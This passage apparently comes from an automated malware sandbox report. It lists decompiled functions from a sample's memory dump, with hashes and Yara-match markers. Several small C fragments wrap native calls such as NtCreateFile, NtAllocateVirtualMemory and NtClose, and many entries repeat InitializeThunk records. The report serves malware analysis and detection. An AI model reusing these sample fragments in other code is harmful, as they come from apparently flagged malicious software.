                                                • Opcode Fuzzy Hash: 3c2591368eefec49bbd50e6ae881d5d24ce5faca65f3f94b5b4afbe06a90733e
                                                • Instruction Fuzzy Hash: DD11B4B2214109ABCB08DF99DC84CEB77ADFF8C358B15864DFA1D93215D634E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A360, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                0x0041a36f
                                                0x0041a377
                                                0x0041a3ad
                                                0x0041a3b1

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                0x0041a54f
                                                0x0041a557
                                                0x0041a579
                                                0x0041a57d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A490(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                0x0041a493
                                                0x0041a496
                                                0x0041a49f
                                                0x0041a4a7
                                                0x0041a4b5
                                                0x0041a4b9

                                                APIs
                                                • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A48A, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E0041A48A(void* __ebx, intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t13;

				gs =  *((intOrPtr*)(__ebx - 0x63));
				0x8bec();
				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x40a943
				E0041AF60(_t13, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}





                                                0x0041a48a
                                                0x0041a48d
                                                0x0041a493
                                                0x0041a496
                                                0x0041a49f
                                                0x0041a4a7
                                                0x0041a4b5
                                                0x0041a4b9

                                                APIs
                                                • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: e88aaddb16ecc7abfa8ea1c0704b21e9ae7d795a9701f57bb74bc7127bba8e6a
                                                • Instruction ID: 6b97a5c630ec2685c44f67ab0c3518f250d9da488a99e2f68952f22904d5cf3e
                                                • Opcode Fuzzy Hash: e88aaddb16ecc7abfa8ea1c0704b21e9ae7d795a9701f57bb74bc7127bba8e6a
                                                • Instruction Fuzzy Hash: E2D02BA950E2C08BDB10FBB4E4D40CABB60EE8061C72859DFE4A807647D17592159391
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009600C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00960048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00960078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
